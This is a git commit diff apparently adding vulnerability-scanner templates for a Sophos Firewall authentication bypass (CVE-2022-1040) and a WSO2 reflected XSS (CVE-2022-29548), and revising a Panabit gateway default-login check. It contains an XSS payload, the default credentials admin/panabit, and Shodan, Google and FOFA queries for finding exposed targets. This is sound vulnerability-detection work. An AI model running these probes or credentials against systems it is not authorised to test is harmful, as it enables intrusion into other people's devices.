Merge branch 'projectdiscovery:master' into dashboard

2022-05-09 15:04:55 -04:00 · 2022-05-09 15:04:55 -04:00 · 8b9d4badbf
parent 4f4b2af6a7 633efcb9ce
commit 8b9d4badbf
4 changed files with 104 additions and 8 deletions
--- a/.new-additions
+++ b/.new-additions
@ -0,0 +1,2 @@
+cves/2022/CVE-2022-1040.yaml
+cves/2022/CVE-2022-29548.yaml
--- a/cves/2022/CVE-2022-1040.yaml
+++ b/cves/2022/CVE-2022-1040.yaml
@ -0,0 +1,45 @@
+id: CVE-2022-1040
+
+info:
+  name: Sophos Firewall - RCE
+  author: For3stCo1d
+  severity: critical
+  description: |
+    An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.
+  reference:
+    - https://github.com/killvxk/CVE-2022-1040
+    - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1040
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 9.8
+    cve-id: CVE-2022-1040
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    shodan-query: http.title:"Sophos"
+  tags: cve,cve2022,sophos,firewall,auth-bypass
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}"
+
+    headers:
+      X-Requested-With: "XMLHttpRequest"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{\"status\":\"Session Expired\"}"
+
+      - type: word
+        part: header
+        words:
+          - "Server: xxxx"
+
+      - type: status
+        status:
+          - 200
--- a/cves/2022/CVE-2022-29548.yaml
+++ b/cves/2022/CVE-2022-29548.yaml
@ -0,0 +1,41 @@
+id: CVE-2022-29548
+
+info:
+  name: WSO2 Management Console - Reflected XSS
+  author: edoardottt
+  severity: medium
+  description: |
+    A reflected XSS issue exists in the Management Console of several WSO2 products.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29548
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-29548
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    google-dork: inurl:"carbon/admin/login"
+  tags: cve,cve2022,wso2,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "CARBON.showWarningDialog('???');alert(document.domain)//???"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
--- a/default-logins/panabit/panabit-default-login.yaml
+++ b/default-logins/panabit/panabit-default-login.yaml
@ -2,16 +2,19 @@ id: panabit-default-login

 info:
  name: Panabit Gateway Default Login
-  author: pikpikcu
+  author: pikpikcu,ritikchaddha
  severity: high
  description: Panabit Gateway default credentials were discovered.
  reference:
    - https://max.book118.com/html/2017/0623/117514590.shtm
    - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf
+    - https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cwe-id: CWE-522
+  metadata:
+    fofa-query: app="Panabit-智能网关"
  tags: panabit,default-login

 requests:
@ -26,31 +29,36 @@ requests:
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

        ------WebKitFormBoundaryAjZMsILtbrBp8VbC
-        Content-Disposition: form-data; name="{{username}}"
+        Content-Disposition: form-data; name="username"

-        admin
+        {{username}}
        ------WebKitFormBoundaryAjZMsILtbrBp8VbC
-        Content-Disposition: form-data; name="{{password}}"
+        Content-Disposition: form-data; name="password"

-        panabit
+        {{password}}
        ------WebKitFormBoundaryAjZMsILtbrBp8VbC--

    payloads:
      username:
-        - username
+        - admin
      password:
-        - password
+        - panabit
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
+        part: body
        words:
          - '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">'
          - 'urn:schemas-microsoft-com:vml'
-        part: body
        condition: and

+      - type: word
+        part: header
+        words:
+          - "paonline_admin"
+
      - type: status
        status:
          - 200